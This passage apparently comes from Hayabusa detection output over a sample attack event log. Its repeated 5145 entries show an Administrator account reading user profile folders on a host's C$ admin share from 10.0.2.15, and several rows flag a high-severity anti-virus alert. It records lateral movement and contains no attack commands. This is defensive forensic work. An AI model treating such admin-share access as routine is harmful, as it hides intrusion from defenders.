| LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 